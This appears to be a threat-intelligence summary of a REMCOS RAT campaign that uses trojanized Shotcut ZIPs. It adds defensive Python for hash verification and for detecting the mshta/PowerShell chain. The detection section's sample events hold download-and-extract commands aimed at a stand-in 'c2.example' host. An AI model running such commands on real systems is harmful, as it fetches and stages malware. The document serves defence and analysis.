Beware the ClickFix Trap: REMCOS RAT Hiding in “Helpful” PUAs

Cybereason GSOC observed a rise in REMCOS RAT campaigns that trojanize legitimate software packages (notably portable Shotcut ZIPs) by replacing genuine DLLs with malicious ones to load multi-stage payloads. The campaigns use callback-style shellcode injection (abusing APIs like EnumSystemCodePagesW), in-memory loaders, and persistent C2 communications to perform keylogging, credential theft, surveillance, and privilege escalation. #REMCOS #Shotcut

Keypoints

  • Attackers distribute the paid REMCOS 7.1.0 RAT via trojanized copies of the Shotcut portable ZIP by replacing legitimate DLLs (e.g., libmlt-7.dll) with malicious loaders.
  • The infection is multi-stage: initial ClickFix/social-engineering → mshta.exe → PowerShell → disguised ZIP (.pdf) → trojanized Shotcut files → multi-DLL loader chain → in-memory shellcode → REMCOS payload.
  • Malicious DLL chain: libmlt-7.dll loads Libcra.dll, which loads SecurePdfSDK.dll and executes shellcode that reads across.bin into memory to run the final REMCOS RAT.
  • Attackers use callback-based shellcode injection (abusing EnumSystemCodePagesW/EnumDateFormatsA-style APIs) to execute shellcode without obvious CreateThread/CreateRemoteThread calls.
  • REMCOS capabilities observed include keylogging, screenshots, webcam/microphone access, browser credential and cookie theft, clipboard capture, service/registry manipulation, and persistent encrypted C2 communications.
  • Defensive recommendations include isolating infected endpoints, verifying software hashes from official sources, blocking identified IOCs, reimaging compromised systems, resetting credentials, and user education on supply-chain and click-fix lures.
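The hash-verification recommendation above is the control that catches this supply-chain swap, since the EXE is untouched and only DLLs are replaced or added. The following is an added example, not code from the report or from the Shotcut project: it hashes every file in a portable ZIP, builds a manifest from a (constructed) genuine copy, and reports replaced, unexpected and missing files in a candidate copy. File names mirror the report; the archive contents are constructed stand-ins.

```python
import hashlib
import io
import zipfile


def build_manifest(zip_bytes: bytes) -> dict:
    """Map every file in the archive to its SHA-256 hex digest."""
    manifest = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            manifest[info.filename] = hashlib.sha256(zf.read(info)).hexdigest()
    return manifest


def verify_package(zip_bytes: bytes, manifest: dict) -> dict:
    """Compare a candidate archive against a known-good manifest.

    'replaced' = same name, different hash (e.g. a swapped libmlt-7.dll);
    'unexpected' = files the genuine package never shipped (loader DLLs, staging blobs);
    'missing' = files the genuine package has but the candidate lacks.
    """
    candidate = build_manifest(zip_bytes)
    return {
        "replaced": sorted(n for n in candidate if n in manifest and candidate[n] != manifest[n]),
        "unexpected": sorted(n for n in candidate if n not in manifest),
        "missing": sorted(n for n in manifest if n not in candidate),
    }


def make_zip(files: dict) -> bytes:
    """Build an in-memory ZIP from {name: bytes} (constructed test data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed stand-ins: a "genuine" portable package (in practice, the ZIP from the
# vendor's official site) and a trojanized copy where the EXE is unchanged,
# libmlt-7.dll is swapped, and loader/staging files have been added.
GENUINE = make_zip({"shotcut.exe": b"genuine exe", "libmlt-7.dll": b"genuine mlt"})
TROJANIZED = make_zip({
    "shotcut.exe": b"genuine exe",
    "libmlt-7.dll": b"malicious loader",
    "Libcra.dll": b"stage 2 loader",
    "SecurePdfSDK.dll": b"stage 3 loader",
    "across.bin": b"staged payload",
})

if __name__ == "__main__":
    print(verify_package(TROJANIZED, build_manifest(GENUINE)))
```

Any non-empty "replaced" or "unexpected" entry is grounds to discard the download and fetch a fresh copy from the official source.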

MITRE Techniques

  • [T1574.001] DLL Search Order Hijacking / DLL Side-Loading – Attackers replace legitimate DLLs inside trojanized Shotcut packages so the application loads malicious libraries instead of the real ones (‘the attackers replaced an open-source multimedia framework DLL (libmlt-7.dll) with a malicious one.’).
  • [T1059.001] PowerShell – MSHTA spawns a PowerShell process that downloads and extracts the second-stage payload (disguised .pdf ZIP) using TAR (‘The MSHTA-spawned PowerShell downloads the second-stage payload from the attacker’s C2 infrastructure. The downloaded file is disguised with a .pdf extension, but it is actually a ZIP archive in disguise.’).
  • [T1218.005] Signed Binary Proxy Execution (mshta) – mshta.exe is used to execute remote JavaScript that kicks off the PowerShell stage and subsequent downloads (‘The mshta.exe process downloads a JavaScript file (token) from the attacker’s C2 server. This remote script spawns a PowerShell process.’).
  • [T1105] Ingress Tool Transfer – Stages and payloads are fetched from attacker-controlled C2 servers (ZIP disguised as PDF, remote JS/token), moving tools into the victim environment (‘The mshta.exe process downloads a JavaScript file (token) from the attacker’s C2 server… The MSHTA-spawned PowerShell downloads the second-stage payload from the attacker’s C2 infrastructure.’).
  • [T1055] Process Injection – The campaign executes shellcode in memory by abusing callback-style enumeration APIs (callback shellcode injection) rather than typical thread-creation APIs (‘Instead of passing a legitimate callback, the malware passes the address of its prepared shellcode (from core.dat) as the callback pointer.’).
  • [T1027] Obfuscated Files or Information – Malware wraps the real payload with random junk header/footer via BCryptGenRandom and similar routines to evade simple memory dumps (‘Calls BCryptGenRandom (from bcrypt.dll) to generate random bytes and uses these random bytes to create junk header and footer sections around the real payload.’).
  • [T1555.003] Credentials from Web Browsers – REMCOS extracts stored logins, passwords, cookies and autofill data from popular browsers for credential theft (‘Targets popular browsers (Chrome, Firefox). Extracts stored logins, passwords, cookies, autofill data, and profiles from known paths.’).
  • [T1071.001] Application Layer Protocol: Web (HTTP/S) – Persistent, encrypted C2 communications and data exfiltration occur over HTTP/S to attacker-controlled domains (example C2 URL shown) (‘Establishes persistent, encrypted connections to the attacker’s C2 domain/server (https://pro.ip-api[.]com/line/?key=QPVvv1rHQJD2pd2&fields=25948155).’).
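The mshta → PowerShell → TAR-extracted ".pdf" chain (T1218.005 and T1059.001 above) is visible in process-creation telemetry before any DLL is loaded. The following is an added example, not code or detection content from the report: two small rules run over constructed Sysmon-style process-creation events, flagging mshta.exe launched with a remote script URL and a PowerShell child of mshta.exe that extracts a .pdf with tar. The event format, host name and URL are constructed for the example.

```python
import re

# Constructed process-creation events in a "key=value|key=value" form modelled
# loosely on Sysmon Event ID 1 fields (sample data, not telemetry from the report).
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\mshta.exe"
    "|CommandLine=mshta.exe http://c2.example/token",
    "ParentImage=C:\\Windows\\System32\\mshta.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -w hidden -c \"iwr http://c2.example/doc.pdf -OutFile doc.pdf; tar -xf doc.pdf\"",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Program Files\\Shotcut\\shotcut.exe"
    "|CommandLine=shotcut.exe",
]


def parse_event(line: str) -> dict:
    """Split one event line into a field dictionary (first '=' separates key and value)."""
    return dict(field.split("=", 1) for field in line.split("|"))


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def mshta_remote_script(ev: dict) -> bool:
    """T1218.005: mshta.exe started with an http/https URL on its command line."""
    return basename(ev["Image"]) == "mshta.exe" and re.search(r"https?://", ev["CommandLine"], re.I) is not None


def mshta_spawned_powershell_tar(ev: dict) -> bool:
    """T1059.001: PowerShell child of mshta.exe whose command line extracts a .pdf with tar."""
    cmd = ev["CommandLine"].lower()
    return (basename(ev["ParentImage"]) == "mshta.exe"
            and basename(ev["Image"]) in ("powershell.exe", "pwsh.exe")
            and re.search(r"\btar\b", cmd) is not None and ".pdf" in cmd)


RULES = {
    "mshta_remote_script": mshta_remote_script,
    "mshta_powershell_tar_pdf": mshta_spawned_powershell_tar,
}


def detect(lines) -> list:
    """Return (rule name, event index) pairs for every event a rule matches."""
    hits = []
    for idx, line in enumerate(lines):
        ev = parse_event(line)
        hits.extend((name, idx) for name, rule in RULES.items() if rule(ev))
    return hits


if __name__ == "__main__":
    for name, idx in detect(SAMPLE_EVENTS):
        print(f"{name}: {SAMPLE_EVENTS[idx]}")
```

The benign Shotcut launch in the sample produces no hit, which is the property to keep when tuning the rules against real telemetry.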

Indicators of Compromise

  • [Domain] C2 / callback domain – pro.ip-api[.]com (example C2 URL: https://pro.ip-api[.]com/line/?key=QPVvv1rHQJD2pd2&fields=25948155)
  • [File Name] Malicious/trojanized library files in Shotcut package – libmlt-7.dll, Libcra.dll (and other malicious DLLs such as SecurePdfSDK.dll)
  • [File Name] In-memory payload / staging files – core.dat, across.bin (final REMCOS executable is loaded from across.bin)
  • [Application / Package] Trojanized distributable – Shotcut portable ZIP (trojanized PUP version of Shotcut distributed in the archive; original EXE not modified)
  • [Binary] Signed system binaries used for execution – mshta.exe (used to fetch and execute remote JavaScript), PowerShell (TAR extraction stage)


Read more: https://www.levelblue.com/blogs/spiderlabs-blog/beware-the-clickfix-trap-remcos-rat-hiding-in-helpful-puas